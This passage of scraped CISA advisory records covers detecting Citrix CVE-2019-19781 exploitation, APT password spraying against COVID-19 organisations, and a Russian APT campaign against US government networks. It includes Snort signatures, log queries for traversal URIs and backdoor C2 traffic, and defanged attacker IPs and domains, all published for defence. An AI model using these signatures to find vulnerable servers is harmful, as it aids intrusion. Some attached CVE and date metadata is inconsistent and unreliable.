Please keep in mind that logs are rotated and compressed, and additional activity may be found in the archives (.gz files) for each log.\n\n**bash.log**\n\nSample Log Entry:\n\n`Jan 10 13:35:47 <local7.notice> ns bash[63394]: nobody on /dev/pts/3 shell_command=\"hostname\"`\n\nNote: The bash log can provide the user (`nobody`), command (`hostname`), and process id (`63394`) related to the nefarious activity.\n\n**sh.log**\n\n**notice.log**\n\n### Check Crontab for Persistence\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nAs with running processes and log entries, any cron jobs created by the user `nobody` are a cause for concern and likely related to a persistence mechanism established by an attacker. Additionally, search for an `httpd` process within the crontab to determine if a system has been affected by NOTROBIN. Analysts can review entries on a live system using the following command:\n\n`crontab -l -u nobody`\n\n### Existence of Unusual Files\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nOpen-source outlets have reported that during incident response activities, attackers exploiting this vulnerability have been placing malicious files in the following directories. Analysts should review file listings for these directories and determine if any suspicious files are present on the server.\n\n * `/netscaler/portal/templates`\n * `/var/tmp/netscaler/portal/templates`\n\n### Snort Alerts\n\n**Context:** Network Alert\n\n**Type:** Signatures\n\nAlthough most activity related to exploitation of the Citrix vulnerability would use SSL, FireEye noted that an HTTP scanner is available to check for the vulnerability. 
The following Snort rules were provided in FireEye\u2019s blog post and would likely indicate a vulnerable Citrix server.[5] These rules should be tuned for the environment and restricted to the IP addresses of the Citrix server(s) to reduce potential false positives.\n\n`alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:\"Potential CVE-2019-19781 vulnerable .CONF response\"; flow:established,to_client; content:\"HTTP/1.\"; depth:7; content:\"200 OK\"; distance:1; content:\"|0d0a|Server: Apache\"; distance:0; content:\"al]|0d0a|\"; distance:0; content:\"encrypt passwords\"; distance:0; content:\"name resolve order\"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)`\n\n`alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:\"Potential CVE-2019-19781 vulnerable .PL response\"; flow:established,to_client; content:\"HTTP/1.\"; depth:7;`\n\n`content:\"200 OK\"; distance:1; content:\"|0d0a|Server: Apache\"; distance:0; `\n\n`content:\"|0d0a|Connection: Keep-Alive\"; `\n\n`content:\"|0d0a0d0a3c48544d4c3e0a3c424f44593e0a3c534352495054206c616e67756167653d6`\n\n`a61766173637269707420747970653d746578742f6a6176617363726970743e0a2f2f706172656e74`\n\n`2e77696e646f772e6e735f72656c6f616428293b0a77696e646f772e636c6f736528293b0a3c2f534`\n\n`3524950543e0a3c2f424f44593e0a3c2f48544d4c3e0a|\"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)`\n\n### Suspicious Network Traffic\n\n**Context:** Network Hunt\n\n**Type: **Methodology\n\nFrom a network perspective, this vulnerability will likely not be detectable, given that the traffic will likely be encrypted (SSL). 
Additionally, due to where they sit on networks, devices such as these are typically not covered in traditional network monitoring and ingress traffic to the device may not be part of a normal SPAN port configuration. In the event network monitoring is available and attackers are using HTTP versions of this exploit, CISA recommends looking for URIs containing `/../` or `/vpns/` to identify potentially malicious activity. It is also worth surveying the traffic for any requests to .xml files or perl (.pl) files as well, as this would not be consistent with normal Citrix web activity. As with the web logs, analysts would be looking for a successful `POST` request followed by a successful `GET` request with the aforementioned characteristics.\n\nGiven that a compromise occurred, activity to look for would be outbound traffic from the Citrix server, both to internal and external hosts. In theory, if an attacker placed a backdoor on the system, it should be connecting outbound to a command and control server. This traffic would most likely be anomalous (outbound TCP Port 80 or 443), given that one would only expect to see inbound TCP/443 traffic to the Citrix server as normal activity. If an attacker is leveraging a Citrix device as an entry point to an organization, anomalous internal traffic could potentially be visible in bro data such as scanning, file transfers, or lateral movement. An exception to internal traffic is that the Citrix ADC device is much more than just an SSL VPN device and is used for multiple types of load balancing. 
As a result, an ADC device may be communicating with internal systems legitimately (web servers, file servers, custom applications, etc.).\n\n**Inbound Exploitation Activity (Suspicious URIs)**\n\n`index=bro dest=<CITRIX_IP_ADDR> sourcetype=bro_http uri=*/../* OR uri=*/vpn* OR uri=*.pl OR uri=*.xml`\n\n**Outbound Traffic Search (Backdoor C2)**\n\n`index=bro sourcetype=bro_conn src=<CITRIX_IP_ADDR> dest!=<INTERNAL_NET>`\n\n`| stats count by src dest dest_port`\n\n`| sort -count`\n\nThe following resources provide additional detection measures.\n\n * Citrix and FireEye Mandiant released an IOC scanning tool for CVE-2019-19781.[[6]](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>) The tool aids customers with detecting potential IOCs based on known attacks and exploits.\n * The National Security Agency released a Cybersecurity Advisory on CVE-2019-19781 with additional detection measures.[[7]](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n * CISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[[8]](<https://github.com/cisagov/check-cve-2019-19781>)\n\n## Impact\n\nCVE-2019-19781 is an arbitrary code execution vulnerability that has been detected in exploits in the wild. 
An attacker can exploit this vulnerability to take control of an affected system.\n\nThe vulnerability affects the following appliances:\n\n * Citrix NetScaler ADC and NetScaler Gateway version 10.5 \u2013 all supported builds before 10.5.70.12\n * Citrix ADC and NetScaler Gateway version 11.1 \u2013 all supported builds before 11.1.63.15\n * Citrix ADC and NetScaler Gateway version 12.0 \u2013 all supported builds before 12.0.63.13\n * Citrix ADC and NetScaler Gateway version 12.1 \u2013 all supported builds before 12.1.55.18\n * Citrix ADC and Citrix Gateway version 13.0 \u2013 all supported builds before 13.0.47.24\n * Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO \u2013 all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).\n\n### Mitigations\n\nThe resources provided include steps for standalone, HA pairs, and clustered Citrix instances.\n\n * Use Citrix's tool to check for the vulnerability.\n   * <https://support.citrix.com/article/CTX269180>\n * Use an open-source utility to check for the vulnerability or previous device compromise.\n   * <https://github.com/cisagov/check-cve-2019-19781>\n   * <https://github.com/x1sec/citrixmash_scanner>\n   * <https://github.com/fireeye/ioc-scanner-CVE-2019-19781/releases/tag/v1.2>\n * Follow instructions from Citrix to mitigate the vulnerability.\n   * <https://support.citrix.com/article/CTX267679>\n   * <https://support.citrix.com/article/CTX267027>\n * Upgrade firmware to a patched version.\n * Subscribe to Citrix Alerts for firmware updates.\n   * <https://support.citrix.com/user/alerts>\n * Patch devices to the most current version. 
\n   * <https://www.citrix.com/downloads/citrix-gateway/>\n   * <https://www.citrix.com/downloads/citrix-adc/>\n   * <https://www.citrix.com/downloads/citrix-sd-wan/>\n\nConsider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible gateway appliances to require user authentication for the VPN before being able to reach these appliances.\n\nCISA's Tip [Handling Destructive Malware](<https://www.us-cert.gov/ncas/tips/ST13-003>) provides additional information, including best practices and incident response strategies.\n\n### References\n\n[[1] Citrix blog: Citrix releases final fixes for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\n[[2] GitHub web_citrix_cve_2019_19781_exploit.yml](<https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>)\n\n[[3] TrustedSec blog: NetScaler Remote Code Execution Forensics](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>)\n\n[[4] FireEye blog: Rough Patch: I Promise It'll Be 200 OK (Citrix ADC CVE-2019-19781)](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n[[5] FireEye blog: Rough Patch: I Promise It'll Be 200 OK (Citrix ADC CVE-2019-19781)](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n[[6] IOC scanning tool for CVE-2019-19781](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>)\n\n[[7] NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\n[[8] CISA Vulnerability Test Tool](<https://github.com/cisagov/check-cve-2019-19781>)\n\n### Revisions\n\nJanuary 31, 2020: Initial Version\n\nFebruary 7, 2020: Added link 
to the Australian Cyber Security Centre script\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-21T12:00:00", "type": "ics", "title": "Detecting Citrix CVE-2019-19781", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-05-21T12:00:00", "id": "AA20-031A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-031a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:42:14", "description": "### Summary\n\n**This is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom\u2019s National Cyber Security Centre (NCSC).**\n\nCISA and NCSC continue to see indications that advanced persistent threat (APT) groups are exploiting the Coronavirus Disease 2019 (COVID-19) pandemic as part of their cyber operations. This joint alert highlights ongoing activity by APT groups against organizations involved in both national and international COVID-19 responses. 
It describes some of the methods these actors are using to target organizations and provides mitigation advice.\n\nThe joint CISA-NCSC [Alert: (AA20-099A) COVID-19 Exploited by Malicious Cyber Actors](<https://www.us-cert.gov/ncas/alerts/aa20-099a>) from April 8, 2020, previously detailed the exploitation of the COVID-19 pandemic by cybercriminals and APT groups. This joint CISA-NCSC Alert provides an update to ongoing malicious cyber activity relating to COVID-19. For a graphical summary of CISA\u2019s joint COVID-19 Alerts with NCSC, see the following [guide](<https://cisa.gov/sites/default/files/publications/Joint_CISA_UK_Tip-COVID-19_Cyber_Threat_Exploitation_S508C.pdf>).\n\n### COVID-19-related targeting\n\nAPT actors are actively targeting organizations involved in both national and international COVID-19 responses. These organizations include healthcare bodies, pharmaceutical companies, academia, medical research organizations, and local governments.\n\nAPT actors frequently target organizations in order to collect bulk personal information, intellectual property, and intelligence that aligns with national priorities.\n\nThe pandemic has likely raised additional interest for APT actors to gather information related to COVID-19. For example, actors may seek to obtain intelligence on national and international healthcare policy or acquire sensitive data on COVID-19-related research.\n\n### Targeting of pharmaceutical and research organizations\n\nCISA and NCSC are currently investigating a number of incidents in which threat actors are targeting pharmaceutical companies, medical research organizations, and universities. APT groups frequently target such organizations in order to steal sensitive research data and intellectual property for commercial and state benefit. 
Organizations involved in COVID-19-related research are attractive targets for APT actors looking to obtain information for their domestic research efforts into COVID-19-related medicine.\n\nThese organizations\u2019 global reach and international supply chains increase exposure to malicious cyber actors. Actors view supply chains as a weak link that they can exploit to obtain access to better-protected targets. Many supply chain elements have also been affected by the shift to remote working and the new vulnerabilities that have resulted.\n\nRecently CISA and NCSC have seen APT actors scanning the external websites of targeted companies and looking for vulnerabilities in unpatched software. Actors are known to take advantage of Citrix vulnerability CVE-2019-19781[[1]](<https://www.us-cert.gov/ncas/alerts/aa20-031a>),[[2]](<https://www.ncsc.gov.uk/news/citrix-alert>) and vulnerabilities in virtual private network (VPN) products from Pulse Secure, Fortinet, and Palo Alto.[[3]](<https://www.us-cert.gov/ncas/alerts/aa20-010a>),[[4]](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n### COVID-19-related password spraying activity\n\nCISA and NCSC are actively investigating large-scale password spraying campaigns conducted by APT groups. 
These actors are using this type of attack to target healthcare entities in a number of countries\u2014including the United Kingdom and the United States\u2014as well as international healthcare organizations.\n\nPreviously, APT groups have used password spraying to target a range of organizations and companies across sectors\u2014including government, emergency services, law enforcement, academia and research organizations, financial institutions, and telecommunications and retail companies.\n\n### Technical Details\n\n[Password spraying](<https://www.ncsc.gov.uk/blog-post/spray-you-spray-me-defending-against-password-spraying-attacks>) is a commonly used style of brute force attack in which the attacker tries a single and commonly used password against many accounts before moving on to try a second password, and so on. This technique allows the attacker to remain undetected by avoiding rapid or frequent account lockouts. These attacks are successful because, for any given large set of users, there will likely be some with common passwords.\n\nMalicious cyber actors, including APT groups, collate names from various online sources that provide organizational details and use this information to identify possible accounts for targeted institutions. The actors will then \u201cspray\u201d the identified accounts with lists of commonly used passwords.\n\nOnce the malicious cyber actor compromises a single account, they will use it to access other accounts where the credentials are reused. Additionally, the actor could attempt to move laterally across the network to steal additional data and implement further attacks against other accounts within the network.\n\nIn previous incidents investigated by CISA and NCSC, malicious cyber actors used password spraying to compromise email accounts in an organization and then, in turn, used these accounts to download the victim organization\u2019s Global Address List (GAL). 
The actors then used the GAL to password spray further accounts.\n\nNCSC has previously provided [examples of frequently found passwords](<https://www.ncsc.gov.uk/blog-post/passwords-passwords-everywhere>), which attackers are known to use in password spray attacks to attempt to gain access to corporate accounts and networks. In these attacks, malicious cyber actors often use passwords based on the month of the year, seasons, and the name of the company or organization.\n\nCISA and NCSC continue to investigate activity linked to large-scale password spraying campaigns. APT actors will continue to exploit COVID-19 as they seek to answer additional intelligence questions relating to the pandemic. CISA and NCSC advise organizations to follow the mitigation advice below in view of this heightened activity.\n\n### Mitigations\n\nCISA and NCSC have previously published information for organizations on password spraying and improving password policy. Putting this into practice will significantly reduce the chance of compromise from this kind of attack.\n\n * [CISA alert on password spraying attacks](<https://www.us-cert.gov/ncas/alerts/TA18-086A>)\n * [CISA guidance on choosing and protecting passwords](<https://www.us-cert.gov/ncas/tips/ST04-002>)\n * [CISA guidance on supplementing passwords](<https://www.us-cert.gov/ncas/tips/ST05-012>)\n * [NCSC guidance on password spraying attacks](<https://www.ncsc.gov.uk/blog-post/spray-you-spray-me-defending-against-password-spraying-attacks>)\n * [NCSC guidance on password administration for system owners](<https://www.ncsc.gov.uk/collection/passwords>)\n * [NCSC guidance on password deny lists](<https://www.ncsc.gov.uk/blog-post/passwords-passwords-everywhere>)\n\nCISA\u2019s [Cyber Essentials](<https://www.cisa.gov/sites/default/files/publications/19_1106_cisa_CISA_Cyber_Essentials_S508C_0.pdf>) for small organizations provides guiding principles for leaders to develop a culture of security and specific actions for IT 
professionals to put that culture into action. Additionally, the UK government\u2019s [Cyber Aware](<https://www.ncsc.gov.uk/cyberaware/home>) campaign provides useful advice for individuals on how to stay secure online during the coronavirus pandemic. This includes advice on protecting passwords, accounts, and devices.\n\nA number of other mitigations will be of use in defending against the campaigns detailed in this report:\n\n * **Update VPNs, network infrastructure devices, and devices being used to remote into work environments with the latest software patches and configurations.** See CISA\u2019s [guidance on enterprise VPN security](<https://www.us-cert.gov/ncas/alerts/aa20-073a>) and NCSC [guidance on virtual private networks](<https://www.ncsc.gov.uk/collection/mobile-device-guidance/virtual-private-networks>) for more information.\n * **Use multi-factor authentication to reduce the impact of password compromises.** See the U.S. National Cybersecurity Awareness Month\u2019s [how-to guide for multi-factor authentication](<https://niccs.us-cert.gov/sites/default/files/documents/pdf/ncsam_howtoguidemfa_508.pdf?trackDocs=ncsam_howtoguidemfa_508.pdf>). Also see NCSC guidance on [multi-factor authentication services](<https://www.ncsc.gov.uk/guidance/multi-factor-authentication-online-services>) and [setting up two factor authentication](<https://www.ncsc.gov.uk/guidance/setting-two-factor-authentication-2fa>).\n * **Protect the management interfaces of your critical operational systems.** In particular, use browse-down architecture to prevent attackers easily gaining privileged access to your most vital assets. See [the NCSC blog on protecting management interfaces](<https://www.ncsc.gov.uk/blog-post/protect-your-management-interfaces>).\n * **Set up a security monitoring capability** so you are collecting the data that will be needed to analyze network intrusions. 
See the [NCSC introduction to logging security purposes](<https://www.ncsc.gov.uk/guidance/introduction-logging-security-purposes>).\n * **Review and refresh your incident management processes.** See [the NCSC guidance on incident management](<https://www.ncsc.gov.uk/guidance/10-steps-incident-management>).\n * **Use modern systems and software.** These have better security built in. If you cannot move off out-of-date platforms and applications straight away, there are short-term steps you can take to improve your position. See [the NCSC guidance on obsolete platform security](<https://www.ncsc.gov.uk/guidance/obsolete-platforms-security>).\n * **Further information:** Invest in preventing malware-based attacks across various scenarios. See CISA\u2019s guidance on [ransomware](<https://www.us-cert.gov/Ransomware>) and [protecting against malicious code](<https://www.us-cert.gov/ncas/tips/ST18-271>). Also see [the NCSC guidance on mitigating malware and ransomware attacks](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>).\n\n### Contact Information\n\nCISA encourages U.S. users and organizations to contribute any additional information that may relate to this threat by emailing [central@cisa.dhs.gov](<mailto:central@cisa.dhs.gov> \"Email CISA Central\" ).\n\nThe NCSC encourages UK organizations to report any suspicious activity to the NCSC via their website: <https://report.ncsc.gov.uk/>.\n\n## Disclaimers\n\n_This report draws on information derived from CISA, NCSC, and industry sources. Any findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times._\n\n_CISA does not endorse any commercial product or service, including any subjects of analysis. 
Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by CISA._\n\n### References\n\n[[1] CISA Alert: Detecting Citrix CVE-2019-19781](<https://www.us-cert.gov/ncas/alerts/aa20-031a>)\n\n[[2] NCSC Alert: Actors exploiting Citrix products vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[3] CISA Alert: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.us-cert.gov/ncas/alerts/aa20-010a>)\n\n[[4] NCSC Alert: Vulnerabilities exploited in VPN products used worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n### Revisions\n\nMay 5, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-25T12:00:00", "type": "ics", "title": "APT Groups Target Healthcare and Essential Services", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2022-01-25T12:00:00", "id": "AA20-126A", "href": 
"https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-126a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:27:50", "description": "### Summary\n\n_This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/>) framework for all referenced threat actor tactics and techniques _\n\nThis joint cybersecurity advisory\u2014written by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA)\u2014provides information on Russian state-sponsored advanced persistent threat (APT) actor activity targeting various U.S. state, local, territorial, and tribal (SLTT) government networks, as well as aviation networks. This advisory updates joint CISA-FBI cybersecurity advisory [AA20-283A: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>).\n\nSince at least September 2020, a Russian state-sponsored APT actor\u2014known variously as Berserk Bear, Energetic Bear, TeamSpy, Dragonfly, Havex, Crouching Yeti, and Koala in open-source reporting\u2014has conducted a campaign against a wide variety of U.S. targets. The Russian state-sponsored APT actor has targeted dozens of SLTT government and aviation networks, attempted intrusions at several SLTT organizations, successfully compromised network infrastructure, and as of October 1, 2020, exfiltrated data from at least two victim servers.\n\nThe Russian-sponsored APT actor is obtaining user and administrator credentials to establish initial access, enable lateral movement once inside the network, and locate high value assets in order to exfiltrate data. 
In at least one compromise, the APT actor laterally traversed an SLTT victim network and accessed documents related to:\n\n * Sensitive network configurations and passwords.\n * Standard operating procedures (SOP), such as enrolling in multi-factor authentication (MFA).\n * IT instructions, such as requesting password resets.\n * Vendors and purchasing information.\n * Printing access badges.\n\nTo date, the FBI and CISA have no information to indicate this APT actor has intentionally disrupted any aviation, education, elections, or government operations. However, the actor may be seeking access to obtain future disruption options, to influence U.S. policies and actions, or to delegitimize SLTT government entities.\n\nAs this recent malicious activity has been directed at SLTT government networks, there may be some risk to elections information housed on SLTT government networks. However, the FBI and CISA have no evidence to date that integrity of elections data has been compromised. Due to the heightened awareness surrounding elections infrastructure and the targeting of SLTT government networks, the FBI and CISA will continue to monitor this activity and its proximity to elections infrastructure.\n\n * Click here for a PDF version of this report.\n * Click here for a STIX package of IOCs.\n\n#### U.S. Heat Map of Activity\n\n[Click here](<https://indd.adobe.com/view/64463245-3411-49f9-b203-1c7cb8f16769>) for an interactive heat map of this activity (current as of November 17, 2020). Hovering the cursor over the map reveals the number and type of entities the Russian APT has targeted in each region. These totals include compromises, scanning, or other reconnaissance activity executed from the Russian APT actor infrastructure.\n\n**Note**: CISA is committed to providing access to our web pages and documents for individuals with disabilities, both members of the public and federal employees. 
If the format of any elements or content within this document interferes with your ability to access the information, as defined in the Rehabilitation Act, please email [info@us-cert.gov](<mailto:%20info@us-cert.gov>). To enable us to respond in a manner most helpful to you, please indicate the nature of your accessibility problem and the preferred format in which to receive the material.\n\n**Note**: the heat map has interactive features that may not work in your web browser. For best use, please download and save this catalog.\n\n### Technical Details\n\nThe FBI and CISA have observed Russian state-sponsored APT actor activity targeting U.S. SLTT government networks, as well as aviation networks. The APT actor is using Turkish IP addresses `213.74.101[.]65`, `213.74.139[.]196`, and `212.252.30[.]170` to connect to victim web servers (_Exploit Public Facing Application_ [[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190/>)]).\n\nThe actor is using `213.74.101[.]65` and `213.74.139[.]196` to attempt brute force logins and, in several instances, attempted Structured Query Language (SQL) injections on victim websites (_Brute Force_ [[T1110](<https://attack.mitre.org/versions/v7/techniques/T1110>)]; _Exploit Public Facing Application_ [[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190/>)]). The APT actor also hosted malicious domains, including possible aviation sector target `columbusairports.microsoftonline[.]host`, which resolved to `108.177.235[.]92` and `[cityname].westus2.cloudapp.azure.com`; these domains are U.S. registered and are likely SLTT government targets (_Drive-By Compromise_ [[T1189](<https://attack.mitre.org/versions/v7/techniques/T1189>)]).\n\nThe APT actor scanned for vulnerable Citrix and Microsoft Exchange services and identified vulnerable systems, likely for future exploitation. 
This actor continues to exploit a Citrix Directory Traversal Bug ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) and a Microsoft Exchange remote code execution flaw ([CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)).\n\nThe APT actor has been observed using Cisco AnyConnect Secure Socket Layer (SSL) virtual private network (VPN) connections to enable remote logins on at least one victim network, possibly enabled by an Exim Simple Mail Transfer Protocol (SMTP) vulnerability ([CVE 2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>)) (_External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133>)]). More recently, the APT actor enumerated and exploited a Fortinet VPN vulnerability ([CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)) for Initial Access [[TA0001](<https://attack.mitre.org/versions/v7/tactics/TA0001/>)] and a Windows Netlogon vulnerability ([CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)) to obtain access to Windows Active Directory (AD) servers for Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v7/tactics/TA0004/>)] within the network (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078>)]). These vulnerabilities can also be leveraged to compromise other devices on the network (_Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v7/tactics/TA0008/>)]) and to maintain _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v7/tactics/TA0003/>)]).\n\nBetween early February and mid-September, these APT actors used `213.74.101[.]65`, `212.252.30[.]170`, `5.196.167[.]184`, `37.139.7[.]16`, `149.56.20[.]55`, `91.227.68[.]97`, and `5.45.119[.]124` to target U.S. SLTT government networks. 
Successful authentications\u2014including the compromise of Microsoft Office 365 (O365) accounts\u2014have been observed on at least one victim network (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078>)]).\n\n### Mitigations\n\n#### Indicators of Compromise\n\nThe APT actor used the following IP addresses and domains to carry out its objectives:\n\n * `213.74.101[.]65`\n * `213.74.139[.]196`\n * `212.252.30[.]170`\n * `5.196.167[.]184`\n * `37.139.7[.]16`\n * `149.56.20[.]55`\n * `91.227.68[.]97`\n * `138.201.186[.]43`\n * `5.45.119[.]124`\n * `193.37.212[.]43`\n * `146.0.77[.]60`\n * `51.159.28[.]101`\n * `columbusairports.microsoftonline[.]host`\n * `microsoftonline[.]host`\n * `email.microsoftonline[.]services`\n * `microsoftonline[.]services`\n * `cityname[.]westus2.cloudapp.azure.com`\n\nIP address `51.159.28[.]101` appears to have been configured to receive stolen Windows New Technology Local Area Network Manager (NTLM) credentials. FBI and CISA recommend organizations take defensive actions to mitigate the risk of leaking NTLM credentials; specifically, organizations should disable NTLM or restrict outgoing NTLM. Organizations should consider blocking IP address `51.159.28[.]101` (although this action alone may not mitigate the threat, as the APT actor has likely established, or will establish, additional infrastructure points).\n\nOrganizations should check available logs for traffic to/from IP address `51.159.28[.]101` for indications of credential-harvesting activity. 
As the APT actors likely have\u2014or will\u2014establish additional infrastructure points, organizations should also monitor for Server Message Block (SMB) or WebDAV activity leaving the network to other IP addresses.\n\nRefer to AA20-296A.stix for a downloadable copy of IOCs.\n\n#### Network Defense-in-Depth\n\nProper network defense-in-depth and adherence to information security best practices can assist in mitigating the threat and reducing the risk to critical infrastructure. The following guidance may assist organizations in developing network defense procedures.\n\n * Keep all applications updated according to vendor recommendations, and especially prioritize updates for external facing applications and remote access services to address CVE-2019-19781, CVE-2020-0688, CVE 2019-10149, CVE-2018-13379, and CVE-2020-1472. Refer to table 1 for patch information on these CVEs.\n\n_Table 1: Patch information for CVEs_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information**\n---|---|---\n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | Citrix Application Delivery Controller; Citrix Gateway; Citrix SDWAN WANOP | [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>); [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>); [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>); [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30; Microsoft Exchange Server 2013 Cumulative Update 23; Microsoft Exchange Server 2016 Cumulative Update 14; Microsoft Exchange Server 2016 Cumulative Update 15; Microsoft Exchange Server 2019 Cumulative Update 3; Microsoft Exchange Server 2019 Cumulative Update 4 | [Microsoft Security Advisory for CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)\n[CVE-2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) | Exim versions 4.87\u20134.91 | [Exim page for 